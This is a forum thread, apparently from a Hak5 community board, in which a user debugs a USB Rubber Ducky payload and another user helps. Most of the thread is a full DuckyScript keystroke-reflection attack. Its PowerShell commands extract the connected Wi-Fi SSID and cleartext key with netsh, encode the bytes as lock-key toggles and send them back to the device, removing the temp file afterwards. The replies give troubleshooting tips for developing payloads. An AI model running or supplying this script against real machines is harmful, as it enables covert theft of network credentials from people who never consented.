geekintheshell Posted March 24 Share Posted March 24 I start with a blank payload screen (Payload Studio Community) , paste code as plain text from example https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-3. I can see the powershell commands executing but a loot file is never created. What am I missing? Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 24 Share Posted March 24 Are you linking to the correct example? I can't see any PowerShell commands there (example 2 has such though). Quote Link to comment Share on other sites More sharing options...
geekintheshell Posted March 24 Author Share Posted March 24 Here's the whole script from the example (PS cmds in bold ) REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY ATTACKMODE HID LED_OFF DELAY 2000 SAVE_HOST_KEYBOARD_LOCK_STATE $_EXFIL_MODE_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE REM Store the currently connected wireless LAN SSID & Key to %tmp%\z GUI r DELAY 100 STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile) STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z" ENTER DELAY 100 REM Convert the stored credentials into CAPSLOCK and NUMLOCK values. GUI r DELAY 100 STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80, STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z" ENTER DELAY 100 REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky. GUI r DELAY 100 STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms; STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z" ENTER DELAY 100 REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete. WAIT_FOR_SCROLL_CHANGE LED_G $_EXFIL_MODE_ENABLED = FALSE RESTORE_HOST_KEYBOARD_LOCK_STATE Quote Link to comment Share on other sites More sharing options...
Solution dark_pyrro Posted March 24 Solution Share Posted March 24 Yeah, that's example 2, and with that sorted, what output do you get if you run the first PowerShell command manually from the Windows run dialog (GUI r) on the target machine? Does the target machine have any wireless networks configured? Quote Link to comment Share on other sites More sharing options...
geekintheshell Posted March 24 Author Share Posted March 24 Thank you, I wasn't seeing that the 1st PS cmd was not executing completely since it goes away so fast on screen. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 24 Share Posted March 24 Running target side stuff manually is often a good way when troubleshooting while developing payloads. Especially in PowerShell when windows might just pop up and disappear. Using the -NoExit flag might be helpful in such cases if starting from the Windows Run Dialog. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.